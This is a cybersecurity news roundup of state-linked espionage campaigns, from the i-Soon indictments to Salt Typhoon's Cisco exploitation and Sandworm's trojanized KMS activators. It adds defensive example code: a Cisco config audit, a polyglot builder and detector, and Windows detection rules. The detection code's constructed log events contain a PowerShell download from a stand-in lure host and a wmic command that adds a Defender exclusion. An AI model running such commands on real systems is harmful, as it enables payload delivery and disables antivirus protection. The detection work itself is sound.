CyberSecurity news

FlagThis - #CyberEspionage

@World - CBSNews.com //
The U.S. Justice Department has indicted 12 Chinese nationals for their alleged involvement in state-linked cyber operations. The individuals include employees of the Chinese technology firm i-Soon, members of the APT27 group (also known as Emissary Panda, TG-3390, Bronze Union, and Lucky Mouse), and two officers from China's Ministry of Public Security. The indictments describe the tools and methods allegedly used in a global hacking campaign. According to the Justice Department, the Ministry of State Security (MSS) and Ministry of Public Security (MPS) used an extensive network of private companies, including i-Soon, to conduct unauthorized computer intrusions in the U.S. and elsewhere.

The DoJ charges these individuals with data theft and with suppressing dissent worldwide. i-Soon, one of the private companies named, allegedly sold hacking tools and services to its customers and carried out intrusions for the PRC (People's Republic of China). The case illustrates the PRC's use of private contractors, which gives the state a degree of deniability, to conduct state-directed cyber espionage.

Recommended read:
References :
  • bsky.app: US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
  • CyberInsider: U.S. Charges 12 Chinese Nationals Over Decade-Long Cyber Espionage Campaign
  • The Cyber Express: The United States Department of Justice (DOJ) has taken action against a major cyber threat, opening indictments against 12 Chinese nationals, including two officers from China’s Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon.
  • bsky.app: USA accuses China's State of operating network of "hackers for hire". Accused 12 individuals, 2 officers of the PRC Ministry of Public Security (MPS), employees of a private company, Anxun Information Technology Co. Ltd, and members of APT27.
  • The Hacker News: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
  • securityaffairs.com: US DOJ charges 12 Chinese nationals for state-linked cyber operations
  • The Register - Security: Xi's freelance infosec warriors apparently paid up to $75K to crack a single American inbox. US government agencies announced Wednesday criminal charges against alleged members of China's Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government agencies and other major orgs.…
  • DataBreaches.Net: U.S. Charges 12 Chinese Contract Hackers and Law Enforcement Officers in Global Computer Intrusion Campaigns
  • cyble.com: U.S. Indictments Shed Light on i-Soon Hacking Tools, Methods
  • Metacurity: US indicts twelve prolific Chinese hackers, including eight i-Soon staffers
  • Carly Page: The Department of Justice has announced criminal charges against 12 Chinese government-linked hackers who are accused of hacking over 100 American organizations, including the U.S. Treasury, over the course of a decade
  • Threats | CyberScoop: US indicts 12 Chinese nationals for vast espionage attack spree
  • BleepingComputer: The U.S. Justice Department has charged Chinese state security officers along with APT27 and i-Soon hackers for network breaches and cyberattacks that have targeted victims globally since 2011.
  • hackread.com: US Charges 12 in Chinese Hacker-for-Hire Network, Offers $10M Reward
  • Risky Business: US indicts the i-Soon and APT27 hackers, the BADBOX botnet gets disrupted again, authorities seize the Garantex crypto exchange, and the FBI arrests hackers who stole Taylor Swift concert tickets.
  • Security | TechRepublic: Targets included the U.S. Treasury Department, journalists, and religious organisations, and the attacks intended to steal data and suppress free speech.
  • techxplore.com: US indicts 12 Chinese nationals in hacking
  • US Charges Members of Chinese Hacker-for-Hire Group i-Soon
  • Matthias Schulze: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
  • WIRED: US Charges 12 Alleged Spies in China’s Freewheeling Hacker-for-Hire Ecosystem

Pierluigi Paganini@Security Affairs //
The Chinese espionage group Silk Typhoon is expanding its cyberattacks to target the global IT supply chain. Microsoft has warned that this group, backed by the Chinese state, has shifted its tactics to focus on remote management tools and cloud services. These supply chain attacks provide access to downstream customers, enabling the group to move laterally within networks and compromise various organizations.

US government agencies have announced criminal charges against alleged members of the Silk Typhoon gang, along with the seizure of internet domains linked to their long-term espionage campaign. The group is accused of compromising US government agencies and other major organizations. The Justice Department has stated that the Chinese government, including its Ministries of State and Public Security, has encouraged and supported private contractors and technology companies to hack and steal information, providing a form of plausible deniability.

Recommended read:
References :
  • bsky.app: Microsoft warns that Chinese cyber-espionage threat group 'Silk Typhoon' has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • The Register - Security: They're good at zero-day exploits, too. Silk Typhoon, the Chinese government crew believed to be behind the December US Treasury intrusions, has been abusing stolen API keys and cloud credentials in ongoing attacks targeting IT companies and state and local government agencies since late 2024, according to Microsoft Threat Intelligence.
  • BleepingComputer: Microsoft warns that Chinese cyber-espionage threat group 'Silk Typhoon' has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • securityaffairs.com: Microsoft warns that China-backed APT Silk Typhoon linked to US Treasury hack, is now targeting global IT supply chains, using IT firms to spy and move laterally.
  • cyberinsider.com: Microsoft Threat Intelligence has identified a shift in tactics by Silk Typhoon, a Chinese state-sponsored cyber-espionage group, which is now targeting IT supply chain providers, including remote management tools and cloud applications.
  • Information Security Buzz: China-linked APT Silk Typhoon targets IT Supply Chain
  • The Hacker News: China-Linked Silk Typhoon Expands Cyber Attacks to IT Supply Chains for Initial Access
  • thecyberexpress.com: The Chinese espionage group known as Silk Typhoon has expanded the cyberattacks to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group’s tactics, highlighting a new focus on commonly used IT solutions such as remote management tools and cloud applications.
  • gbhackers.com: Microsoft Warns Silk Typhoon Hackers Exploit Cloud Services to Attack IT Supply Chain
  • Cyber Security News: Microsoft Warns Silk Typhoon Hackers Exploit Cloud Services to Attack IT Supply Chain
  • The Register - Security: Feds name and charge alleged Silk Typhoon spies behind years of China-on-US attacks
  • Virus Bulletin: Microsoft Threat Intelligence has identified a shift in tactics used by Silk Typhoon. The espionage group is now targeting common IT solutions like remote management tools and cloud applications to gain initial access.
  • Source: Silk Typhoon targeting IT supply chain
  • www.scworld.com: Microsoft Threat Intelligence's report on Silk Typhoon's new tactic highlights the group's shift towards IT supply chain attacks.
  • Threats | CyberScoop: Silk Typhoon shifted to specifically targeting IT management companies
  • Vulnerable U: Microsoft Details Silk Typhoon’s IT Supply Chain Attacks
  • Microsoft warns that Chinese espionage group Silk Typhoon is increasingly exploiting common IT solutions to infiltrate networks and exfiltrate data.
  • securityonline.info: Zero-Day Attacks & Stolen Keys: Silk Typhoon Breaches Networks
  • Security Risk Advisors: Chinese Silk Typhoon threat actor targets global IT supply chains. Consider patching vulnerabilities, enforce MFA, audit cloud access.

@gbhackers.com //
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.

If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

Recommended read:
References :
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
  • The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
  • BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns.
  • Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
  • www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
  • www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
  • www.scworld.com: PowerShell exploited in new Kimsuky intrusions
  • Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
  • The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
  • MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
  • securityaffairs.com: Analyzing DEEP#DRIVE: North Korean

@cyberscoop.com //
The Chinese nation-state hacking group Salt Typhoon, despite facing US sanctions, continues to actively target telecommunications providers. Between December 2024 and January 2025, Recorded Future observed Salt Typhoon breaching five telecom firms, including a US-based affiliate of a UK telecom provider, a US internet service provider, and companies in Italy, South Africa, and Thailand. The group also performed reconnaissance on a Myanmar-based telecom provider.

Salt Typhoon exploited two vulnerabilities in Cisco IOS XE software to compromise unpatched Cisco devices: CVE-2023-20198, a web UI flaw that lets an unauthenticated attacker create a privilege-15 account, chained with CVE-2023-20273 to run commands as root. Recorded Future observed attempts against more than 1,000 Cisco devices worldwide, concentrated in telecom networks. On compromised devices the group created privileged accounts and configured GRE tunnels to move traffic out of the network. Salt Typhoon also targeted universities, including the University of California and Utah Tech, potentially seeking access to research related to telecommunications and engineering.
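
A configuration audit for the three things the paragraph above gives a defender to look for on IOS XE: the web UI left enabled (the surface for the two CVEs), privilege-15 local accounts nobody approved, and GRE tunnel interfaces. This is example code added for this page, not tooling from Recorded Future, Cisco or any other source cited here; the running-config excerpt and the `APPROVED_ADMINS` allowlist are constructed.

```python
"""Audit a Cisco IOS XE running-config for the exposure and the post-compromise
traces described above: the web UI left enabled (the attack surface for
CVE-2023-20198 and CVE-2023-20273), privilege-15 local accounts that are not
on an approved list, and GRE tunnel interfaces that could carry traffic out of
the network. Example code added for this page; it is not tooling from Recorded
Future, Cisco or the page's other sources. The config below is constructed."""
import re

# Constructed running-config excerpt, not taken from a real device.
SAMPLE_CONFIG = """\
version 17.3
hostname edge-rtr-01
!
username netops privilege 15 secret 9 $9$placeholderhash1
username cisco_tac_admin privilege 15 secret 9 $9$placeholderhash2
username monitor privilege 1 secret 9 $9$placeholderhash3
!
ip http server
ip http secure-server
!
interface Tunnel100
 ip address 10.99.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 203.0.113.77
!
interface GigabitEthernet0/0/0
 ip address 198.51.100.10 255.255.255.0
!
end
"""

APPROVED_ADMINS = {"netops"}  # assumed allowlist; substitute the real one


def parse_interfaces(config):
    """Map each 'interface X' stanza to its indented sub-commands."""
    interfaces, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(" ", 1)[1].strip()
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None  # '!' or a top-level command ends the stanza
    return interfaces


def audit_ios_xe_config(config, approved_admins=APPROVED_ADMINS):
    """Return a list of (finding, detail) tuples."""
    findings = []
    # 1. Web UI reachable: 'ip http server' / 'ip http secure-server' present.
    #    The anchored regex does not match the negated 'no ip http server'.
    for directive in ("ip http server", "ip http secure-server"):
        if re.search(rf"^{re.escape(directive)}\s*$", config, re.M):
            findings.append(("web_ui_enabled", directive))
    # 2. Privilege-15 users outside the allowlist: CVE-2023-20198 is used to
    #    create exactly this kind of account.
    for m in re.finditer(r"^username (\S+) privilege 15\b", config, re.M):
        if m.group(1) not in approved_admins:
            findings.append(("unapproved_priv15_user", m.group(1)))
    # 3. Tunnel interfaces in GRE mode. IOS defaults a Tunnel interface to
    #    'tunnel mode gre ip' when no mode is shown, so absence counts as GRE.
    for name, lines in parse_interfaces(config).items():
        if not name.startswith("Tunnel"):
            continue
        mode = next((l for l in lines if l.startswith("tunnel mode ")), "tunnel mode gre ip")
        if " gre" in mode:
            dest = next((l.split()[-1] for l in lines if l.startswith("tunnel destination ")), "?")
            findings.append(("gre_tunnel", f"{name} -> {dest}"))
    return findings
```

Run it against the output of `show running-config` pulled from each device; anything in `web_ui_enabled` should be fixed with `no ip http server` / `no ip http secure-server` (or an ACL restricting the web UI) until the device is patched, and every unapproved privilege-15 user and every tunnel with an unfamiliar destination deserves an explanation. Cisco's Talos advisory for CVE-2023-20198 also published a check for the implant itself: an HTTP POST to `/webui/logoutconfirm.html?logon_hash=1` on the device's web UI returns a hexadecimal string when the implant is present.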

Recommended read:
References :
  • cyberscoop.com: Salt Typhoon remains active, hits more telecom networks via Cisco routers
  • The Register - Security: More victims of China's Salt Typhoon crew emerge: Telcos just now hit via Cisco bugs
  • Carly Page: The China-backed Salt Typhoon group is still hacking telecommunications providers, despite government sanctions. Recorded Future says Salt Typhoon breached five firms between December and January, including a US affiliate of a prominent UK provider and a US-based ISP
  • techcrunch.com: The China-backed Salt Typhoon group is still hacking telecommunications providers, despite government sanctions.
  • www.wired.com: Wired's coverage of Salt Typhoon's ongoing hacking activities.
  • cyberinsider.com: Chinese Hackers Breach Cisco Devices in Global Telecom Attacks
  • securebulletin.com: RedMike (Salt Typhoon) continues global Telecom attacks
  • Secure Bulletin: Report on RedMike's continued attacks on telecom providers.
  • Talkback Resources: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks [exp] [net]
  • Talkback Resources: Chinese state-sponsored APT group Salt Typhoon targets telecommunications providers and universities by exploiting Cisco vulnerabilities, creating privileged accounts, bypassing firewalls, and exfiltrating data using GRE tunnels, prompting organizations to patch devices, enforce access controls, and monitor for unauthorized changes.
  • PCMag UK security: China's Salt Typhoon Spies Are Still Eavesdropping on Global Networks
  • ciso2ciso.com: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks – Source: www.securityweek.com
  • securityaffairs.com: China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws
  • BleepingComputer: China's Salt Typhoon hackers are still actively targeting telecoms worldwide and have breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices.
  • industrialcyber.co: Insikt Group details RedMike cyber espionage campaign on telecom providers using Cisco vulnerabilities
  • securityonline.info: Cybersecurity researchers at Insikt Group have identified an ongoing cyber espionage campaign by RedMike (also tracked as Salt Typhoon).
  • SecureWorld News: Salt Typhoon Expands Espionage Campaign, Targets Cisco Routers
  • Cisco Talos Blog: Weathering the storm: In the midst of a Typhoon
  • cyberscoop.com: Cisco Talos observed the campaign targeting major U.S. telecommunication companies and observed the attackers primarily used legitimate login credentials to gain initial access, making detection and prevention difficult.
  • cyberscoop.com: Salt Typhoon gained initial access to telecoms through Cisco devices
  • securityaffairs.com: Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers

Ridhika Singh@cysecurity.news //
A sophisticated cyber espionage campaign, dubbed UNK_CraftyCamel, is actively targeting aviation and satellite organizations in the United Arab Emirates (UAE). Cybersecurity researchers at Proofpoint discovered this attack in October 2024. The attackers are employing advanced techniques, including the use of polyglot files, a custom Go-based backdoor known as Sosano, and compromised business accounts, to evade detection. This highly targeted campaign leverages compromised business relationships and tailored lures to deliver a multi-stage infection chain.

The attack begins with phishing emails sent from the compromised account of an Indian electronics company, INDIC Electronics, to targets with which it has an existing business relationship. The emails link to malicious ZIP files hosted on domains that mimic legitimate companies. The archives contain malware components packaged as polyglot files, a technique rarely seen in espionage operations: each file is structured so that it parses validly as more than one format, so a component can pass inspection as a benign file of one type while a different parser executes it as another. This choice points to an adversary focused on stealth and evasion.

Once executed, the polyglot malware installs Sosano, a custom Go-based backdoor designed for stealth and resilience. Sosano establishes a connection with a command-and-control server and waits for commands, which include listing directories, executing shell commands, and downloading additional payloads. While some tactics overlap with known Iranian-aligned threat actors, researchers have not definitively linked this activity to any previously identified group. The attackers’ focus on aviation and satellite communications in the UAE suggests a strategic intelligence-gathering motive.
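
To make the polyglot idea concrete, here is an example added for this page (not Proofpoint's tooling, and not a reproduction of the campaign's files): it builds one common kind of polyglot, a file that starts as one format but is also a complete ZIP archive, and then applies the check a scanner can use to catch the whole family, namely finding more than one format signature in the same bytes. The prefix bytes and archive contents are constructed.

```python
"""Build a small polyglot and scan files for the property that betrays one:
more than one file-format signature in the same bytes, or a ZIP archive whose
data does not start at offset 0. Example code added for this page; it is not
Proofpoint's tooling and does not reproduce the campaign's files, only the
general technique. The sample prefix and archive contents are constructed."""
import io
import zipfile

# Multi-byte magic values with a low chance of appearing by accident.
SIGNATURES = [
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),
]


def make_zip_polyglot(prefix, member="payload.txt", member_data=b"hello"):
    """Prepend arbitrary bytes to a ZIP archive. ZIP readers locate the central
    directory from the END of the file, so the result is still a valid archive
    while its first bytes present whatever format the prefix declares."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, member_data)
    return prefix + buf.getvalue()


def read_zip_member(data, member):
    """Show that the archive half still works: extract a member through zipfile."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(member)


def find_signatures(data):
    """Every (offset, format) at which a known signature occurs, in file order."""
    hits = []
    for magic, fmt in SIGNATURES:
        start = 0
        while (i := data.find(magic, start)) != -1:
            hits.append((i, fmt))
            start = i + 1
    return sorted(hits)


def is_polyglot(data):
    """Flag a file that carries signatures of two different formats, or that
    zipfile accepts as an archive although the local-header magic is not first."""
    formats = {fmt for _, fmt in find_signatures(data)}
    shifted_zip = zipfile.is_zipfile(io.BytesIO(data)) and not data.startswith(b"PK\x03\x04")
    return len(formats) > 1 or shifted_zip
```

The point of the check is that it does not depend on which two formats were combined: a file that satisfies two parsers has a reason to, and a gateway that only inspects the format announced by the first bytes will see the decoy half and miss the other.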

Recommended read:
References :
  • Cyber Security News: Hackers Exploit Business Relationships to Attack Arab Emirates Aviation Sector
  • gbhackers.com: Hackers Exploiting Business Relationships to Attack Arab Emirates Aviation Sector
  • The Record: Proofpoint researchers say they spotted new backdoor malware that suspected Iranian regime-backed hackers have aimed at sectors such as aviation, satellite communications and critical transportation infrastructure in the United Arab Emirates.
  • Information Security Buzz: Highly Targeted Cyber Espionage Campaign Targeting UAE Aviation Sector
  • thehackernews.com: Suspected Iranian Hackers Used Compromised Indian Firm's Email to Target U.A.E. Aviation Sector
  • Virus Bulletin: Proofpoint researchers identified a highly targeted email-based campaign targeting UAE organizations. The malicious messages were sent from a compromised entity in a trusted business relationship with the targets, and used lures customized to every target.
  • www.cysecurity.news: A highly targeted cyber espionage campaign, dubbed UNK_CraftyCamel, is targeting aviation and satellite organizations in the UAE. Attackers use polyglot files, a custom Go-based backdoor (Sosano), and compromised business accounts to evade detection.
  • Vulnerable U: Highly Targeted Polyglot Malware Campaign Hits UAE Aviation and Satellite Firms
  • Industrial Cyber: Proofpoint details likely Iranian-backed Sosano malware targeting UAE’s critical sectors
  • New Cyber-Espionage Campaign Targets UAE Aviation and Transport
  • www.scworld.com: New Sosano malware attacks target UAE
  • securityonline.info: UNK_CraftyCamel: New Threat Group Using Polyglot Malware in UAE
  • securityaffairs.com: A new cyber espionage campaign is targeting UAE aviation and satellite companies. Researchers have identified a custom Go-based backdoor, Sosano, being used in this operation.
  • www.redpacketsecurity.com: Researchers have identified a new cyber-espionage campaign targeting aviation and satellite organizations in the UAE.

info@thehackernews.com (The Hacker News)@The Hacker News //
A new cyber espionage campaign, attributed to the Belarus-aligned threat actor Ghostwriter, is targeting opposition activists in Belarus and Ukrainian military and government organizations. The campaign leverages malware-laced Microsoft Excel documents as lures to deliver a new variant of PicassoLoader. Ghostwriter, also known as Moonscape, TA445, UAC-0057, and UNC1151, has been active since 2016 and is known to align with Russian security interests, promoting narratives critical of NATO.

The attack chain begins with a Google Drive shared document hosting a RAR archive that contains a malicious Excel workbook. When opened, the workbook runs an obfuscated macro that drops a simplified version of PicassoLoader. While a decoy Excel file is shown to the victim, additional payloads are downloaded onto the system. Steganography is also used, with malicious code hidden inside seemingly harmless JPG images fetched from remote URLs to deliver second-stage malware. SentinelOne has observed Ghostwriter repeatedly using Excel workbooks with Macropack-obfuscated VBA macros and embedded .NET downloaders, indicating a persistent cyberespionage operation against Ukrainian targets.

Recommended read:
References :
  • bsky.app: After many reports on Ghostwriter's info-ops, SentinelOne has seen the group returning to malware delivery, this time with a campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations
  • Talkback Resources: Ghostwriter | New Campaign Targets Ukrainian Government and Belarusian Opposition
  • The Hacker News: Belarus-Linked Ghostwriter Uses Macropack-Obfuscated Excel Macros to Deploy Malware
  • Talkback Resources: Talkback post on Excel Macros to Deploy Malware
  • Anonymous: A new malware campaign targets Belarusian activists and the Ukrainian military, using Excel files to deliver PicassoLoader.
  • Virus Bulletin: SentinelLABS researcher Tom Hegel writes about an extension of the long-running Ghostwriter campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations with weaponized Excel documents lures.
  • Information Security Buzz: Cybersecurity researchers at SentinelLABS have uncovered a new campaign linked to the long-running Ghostwriter operation, targeting Belarusian opposition activists and Ukrainian military and government entities. 
  • gbhackers.com: Ghostwriter Malware Targets Government Organizations with Weaponized XLS File
  • securityaffairs.com: New Ghostwriter campaign targets Ukrainian Government and opposition activists in Belarus
  • Know Your Adversary: 058. Hunting for Ghostwriter
  • Cyber Security News: Ghostwriter Malware Attacks Government Organizations Using Weaponized XLS File

Arda Büyükkaya@EclecticIQ Blog //
The Russian Sandworm group, a cyber-espionage unit with ties to the Russian military, is actively targeting Windows users in Ukraine. They are distributing malicious Microsoft Key Management Service (KMS) activators and fake Windows updates, compromising systems in the process. This campaign, which likely started in late 2023, showcases the ongoing cyber warfare efforts targeting Ukraine.

EclecticIQ threat analysts have linked these attacks to Sandworm based on overlapping infrastructure, consistent tactics, techniques, and procedures (TTPs), and the use of ProtonMail accounts to register the domains used in the attacks. The trojanized activators deploy a loader tracked as BACKORDER, which in turn delivers DarkCrystal RAT (DcRAT). To blend in with what a genuine KMS activator does, the loader abuses legitimate Windows utilities: it uses `wmic` to add Microsoft Defender exclusions and `reg` to read Defender's status, while injecting its malicious payload onto the compromised system.
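
The two Windows tradecraft patterns on this page, the Emerald Sleet/Kimsuky "open PowerShell as administrator and paste this" lure described earlier and the Defender tampering just described for BACKORDER, can be hunted with the same kind of logic, so one detection example serves both. It is example code added for this page, not from Microsoft or EclecticIQ. The records are constructed in a Sysmon process-creation and PowerShell script-block-logging shape; the field names and the exact `wmic`/`reg` command lines are assumptions illustrating the behaviour, not captured samples.

```python
"""Detection logic for two Windows tradecraft patterns described on this page:
(1) a user opens an elevated PowerShell and pastes attacker-supplied code that
downloads a remote-access tool (the Emerald Sleet/Kimsuky tactic), and (2) a
loader uses wmic to add Microsoft Defender exclusions and reg to query
Defender's state (the BACKORDER behaviour described for Sandworm).
Example code added for this page, not from Microsoft or EclecticIQ. The log
records below are constructed in a Sysmon / PowerShell-logging-like shape;
field names and the exact command lines are assumptions, not samples."""
import re

DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)
DEFENDER_EXCLUSION = re.compile(
    r"(MSFT_MpPreference.*\bAdd\b.*Exclusion|Add-MpPreference.*-Exclusion)", re.I | re.S)
DEFENDER_REG_QUERY = re.compile(r"reg(?:\.exe)?\s+query\s+.*Windows Defender", re.I)

# Constructed events. "process" ~ Sysmon event 1; "scriptblock" ~ PowerShell 4104.
EVENTS = [
    # 1. User opens PowerShell via "Run as administrator" (High integrity) and
    #    pastes the lure's code. Note the process command line is empty of it.
    {"type": "process", "pid": 4412, "integrity": "High",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"type": "scriptblock", "pid": 4412,
     "text": r"Invoke-WebRequest -Uri https://lure.example.invalid/rd.zip -OutFile $env:TEMP\rd.zip; Expand-Archive $env:TEMP\rd.zip"},
    # 2. A trojanized activator tampers with Defender the way the loader is described to.
    {"type": "process", "pid": 5120, "integrity": "High",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Users\Public\kms-activator.exe",
     "cmdline": r'wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpPreference call Add ExclusionPath="C:\Users\Public"'},
    {"type": "process", "pid": 5124, "integrity": "High",
     "image": r"C:\Windows\System32\reg.exe",
     "parent": r"C:\Users\Public\kms-activator.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware'},
    # 3. Benign: an unelevated interactive session listing a directory.
    {"type": "process", "pid": 6000, "integrity": "Medium",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    {"type": "scriptblock", "pid": 6000, "text": r"Get-ChildItem C:\Users"},
]


def detect(events):
    """Return sorted (rule, pid) alerts for the events above."""
    alerts = set()
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    for e in events:
        if e["type"] == "scriptblock":
            # Pasted code never reaches the process command line; it is only
            # visible in script block logging. Join to the host process to learn
            # that the console was elevated, which is what the lure asks for.
            host = by_pid.get(e["pid"])
            if (host and host["integrity"] == "High"
                    and host["image"].lower().endswith("powershell.exe")
                    and DOWNLOAD_CRADLE.search(e["text"])):
                alerts.add(("elevated_powershell_download_cradle", e["pid"]))
        elif e["type"] == "process":
            img, cmd = e["image"].lower(), e["cmdline"]
            if img.endswith(("wmic.exe", "powershell.exe")) and DEFENDER_EXCLUSION.search(cmd):
                alerts.add(("defender_exclusion_added", e["pid"]))
            if img.endswith("reg.exe") and DEFENDER_REG_QUERY.search(cmd):
                alerts.add(("defender_status_query", e["pid"]))
    return sorted(alerts)
```

The practical caveat is in the first rule: without PowerShell script block logging enabled, the pasted code leaves no trace in process-creation telemetry, and all that remains is an elevated console followed by an unexplained download and a new service or scheduled task. The Defender rules are only as good as your baseline; legitimate software does add exclusions, so tune on the parent process, as in the sample where the parent is an activator dropped in a user-writable directory.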

Recommended read:
References :
  • bsky.app: The Sandworm Russian military cyber-espionage group is targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
  • BleepingComputer: Sandworm Russian military cyber-espionage group is targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
  • www.bleepingcomputer.com: Russian military hackers deploy malicious Windows activators in Ukraine
  • Know Your Adversary: EclecticIQ analysts presented a report on recent Sandworm campaign, where the threat actors used trojanized Microsoft KMS activation tools to deliver BACKORDER loader.
  • EclecticIQ Blog: Sandworm APT Targets Ukrainian Users With Trojanized Microsoft KMS Activation Tools In Cyber Espionage Campaigns
  • Anonymous: Details about the malicious Microsoft KMS activation tools used in a recent Sandworm campaign.
  • MSSP feed for Latest: Reports that attacks involving malicious Microsoft Key Management Service activators and bogus Windows updates have been deployed.
  • securityaffairs.com: Report highlights that a Sandworm subgroup exploited trojanized Microsoft KMS activation tools.
  • ciso2ciso.com: Source: socprime.com – Author: Daryna Olyniychuk. For over a decade, russia-backed Sandworm APT group (also tracked as UAC-0145, APT44) has consistently targeted Ukrainian organizations, with a primary focus on state bodies and critical infrastructure.
  • www.microsoft.com: Details of the BadPilot operation conducted by the Sandworm subgroup, targeting critical organizations and governments.
  • securityonline.info: Discussion of the campaign, the methods used by the attackers and potential consequences.
  • BleepingComputer: A subgroup of the Russian state-sponsored hacking group APT44, also known as 'Seashell Blizzard' and 'Sandworm', has been targeting critical organizations and governments in a multi-year campaign dubbed 'BadPilot.'
  • Microsoft: Microsoft Threat Intelligence reports on a subgroup within Russian APT Seashell Blizzard (aka Sandworm, APT44) and their multiyear initial access operation (tracked as the "BadPilot campaign"). This blog details this subgroup's recently observed tactics, techniques, and procedures (TTPs), and describes three of its distinct exploitation patterns. The geographical targeting to a near-global scale of this campaign expands Seashell Blizzard's scope of operations beyond Eastern Europe. Additionally, the opportunistic access methods outlined in this campaign will continue to offer Russia opportunities for niche operations and activities. Indicators of compromise and Yara rules are listed.
  • socprime.com: Sandworm APT Attacks Detection: russian State-Sponsored Hackers Deploy Malicious Windows KMS Activators to Target Ukraine
  • securityaffairs.com: Microsoft Threat Intelligence has published research on a subgroup of the Russia-linked APT group Seashell Blizzard behind the global BadPilot campaign, which compromises infrastructure to support Russian cyber operations. Seashell Blizzard (aka Sandworm, BlackEnergy and TeleBots) has been active in the cybersecurity arena for more than a decade.

Pierluigi Paganini@securityaffairs.com //
The Belgian federal prosecutor's office is currently investigating a significant data breach of its state security service (VSSE), allegedly perpetrated by Chinese government hackers. The breach, which targeted the VSSE's external mail server, occurred between 2021 and 2023 and exploited a vulnerability in Barracuda's Email Security Gateway Appliance. This incident is considered a severe security lapse and has prompted a formal inquiry by Belgian authorities.

Approximately 10% of the VSSE's staff emails were stolen over that two-year period. Classified data is reported to have remained secure, but the personal information of nearly half the service's members may have been compromised, according to press reports.

The Chinese Embassy in Belgium has dismissed the allegations as "false information".

Recommended read:
References :
  • DataBreaches.Net: Belgian prosecutor probes alleged Chinese hacking of intelligence service
  • gbhackers.com: Chinese Hackers Breach Belgium State Security Service as Investigation Continues
  • Carly Page: The Belgian federal prosecutor's office confirmed to TechCrunch on Friday that it is investigating an alleged data breach of its state security service (VSSE) by Chinese government hackers. The hackers reportedly exploited a Barracuda ESG vulnerability to access VSSE’s external mail server between 2021 and 2023
  • securityaffairs.com: China-linked threat actors stole 10% of Belgian State Security Service (VSSE)’s staff emails
  • The420.in: China’s Cyber Espionage Skyrockets: 150% Surge in Attacks Uncovered
  • securityaffairs.com: Belgian authorities are investigating Chinese hackers for breaching its State Security Service (VSSE), stealing 10% of emails from 2021 to May 2023.

Pierluigi Paganini@securityaffairs.com //
